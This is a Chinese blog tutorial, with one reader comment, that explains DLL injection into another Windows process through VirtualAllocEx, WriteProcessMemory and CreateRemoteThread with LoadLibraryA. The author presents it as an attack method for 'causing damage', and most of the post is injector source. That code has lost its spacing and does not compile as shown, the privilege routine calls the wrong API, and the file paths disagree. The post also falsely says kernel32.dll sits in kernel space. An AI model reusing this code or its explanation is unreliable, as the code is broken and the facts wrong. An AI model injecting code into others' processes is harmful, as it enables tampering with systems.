简单的DLL注入及代码详解
dll注入是一种常用的攻击方法,其大概步骤如下:
1,编译出一个DLL,这个DLL的DllMain里面负责搞破坏
2,打开一个目标进程(就是你要搞破坏的进程)
3,在打开的目标进程里面分配一块内存(它的用处是用于放我们要注入的dll名称)
4,得到Kernel32.dll里面的LoadLibraryA的地址(注意,Kernel.dll是内核空间里面的,所以,在所有的进程里面,它的地址都一样的,所以LoadLibrary的地址在所有的进程里面也都是一样的)。
详细代码与过程如下所示:
1,打开Visual studio 2010,并且新建一个空的C++工程,我们不防命名为CPP,当然,如果你想命名为Donald Knuth也是可以的。
2,添加一个新的C++ 文件,不妨命名为ACM.cpp,当然,如果你想命名为BillGates.cpp也是可以的。
3,在上面的ACM.cpp里面输入以下代码:
#include <windows.h>BOOL __stdcall DllMain( HANDLE hDllHandle, DWORD dwReason, LPVOID lpreserved ){switch(dwReason){caseDLL_PROCESS_ATTACH:caseDLL_THREAD_ATTACH:MessageBox(NULL, TEXT("DLL加载"), TEXT("message"), MB_OK);break;caseDLL_PROCESS_DETACH:caseDLL_THREAD_DETACH:MessageBox(NULL, TEXT("DLL卸载"), TEXT("message"), MB_OK);break;}return(TRUE);}4,新建一个Library.def文件,输入以下内容:
LIBRARY"CPP"EXPORTSDllMain
5,设置这个空项目的类型为dll,并在Linker选项下面的Input下面的Module Definition File里面输入Library.def(上面新建的那个def文件的名字)
6,编译这个工程,得到了一个名字为CPP.dll的文件,将其保存在E:\\的根目录下面。
7,新建一个新的空项目,并添加一个文件main.cpp,输入以下内容:
#undefUNICODE#include <windows.h>#include <iostream>using namespace std;#define _T(queto)TEXT(queto)voidEnableProcessPrivilege(LPTSTRlpszPrivilege);voidInjectToProcess(DWORDdwProcessID, LPTSTRlpszDllName);int main(){DWORDdwProcessID;cout<<"Please input the id of process which you want to inject!"<<endl;cin>>dwProcessID;//EnableProcessPrivilege(SE_DEBUG_NAME);InjectToProcess(dwProcessID, "G:\\cpp.dll");}voidEnableProcessPrivilege(LPTSTRlpszPrivilege){HANDLEhToken;TOKEN_PRIVILEGESpriv={1,{0, 0, SE_PRIVILEGE_ENABLED}};OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);DWORDSize=lstrlen(lpszPrivilege);LookupPrivilegeName(NULL, &(priv.Privileges[0].Luid), lpszPrivilege, &Size);AdjustTokenPrivileges(hToken, FALSE, &priv, sizeof(priv), NULL, NULL);CloseHandle(hToken);}voidInjectToProcess(DWORDdwProcessID, LPTSTRlpszDllName){HANDLEhProcToInject=INVALID_HANDLE_VALUE;LPVOIDszDllName=NULL;HMODULEhKernel;LPTHREAD_START_ROUTINEThreadProc;HANDLEhRemoteThread;DWORDdwFileNameLength;__try{hProcToInject=OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);if(hProcToInject==NULL){cout<<"OPen process failed!"<<endl;__leave;}dwFileNameLength=(lstrlen(lpszDllName)+ 1)* sizeof(TCHAR);szDllName=VirtualAllocEx(hProcToInject, 0, dwFileNameLength, MEM_COMMIT, PAGE_READWRITE);if(szDllName==NULL){cout<<"alloc memory failed!"<<endl;__leave;}if(!WriteProcessMemory(hProcToInject, szDllName, lpszDllName, dwFileNameLength, NULL)){cout<<"wirite memory failed!"<<endl;__leave;}hKernel=GetModuleHandle(_T("kernel32.dll"));if(hKernel==INVALID_HANDLE_VALUE){cout<<"get module handle failed!"<<endl;__leave;}ThreadProc=(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel, "LoadLibraryA");if(ThreadProc==NULL){cout<<"Get function failed!"<<endl;__leave;}hRemoteThread=CreateRemoteThread(hProcToInject, NULL, 0, ThreadProc, szDllName, 0, NULL);if(hRemoteThread==NULL)__leave;//WaitForSingleObject(hRemoteThread, INFINITE);}__finally{}}
8,然后编译运行,会弹出一个黑框(Console),并提示你输入你要注入的进程的PID,此时,你可以打开任务管理器,并打开查看->选择列下面的pID标签。在这里你可以看到所有进程的PID,你那个黑框上面输入你想注入的进程的PID就可以了。至此,dll注入已经完成,当然,我没有搞破坏,如果你想搞破坏,那是你的事。
代码说明:
有些人可能说,我这里面非要在任务管理器里面输入PID,其实完全可以不需要这样,你可以使用Process32First和Process32Next两个函数遍历系统进程列表,然后从中找到你要注入的进程列表。
- 1楼BossJue__4天前 13:16
- 没解释,只有代码,表示求解释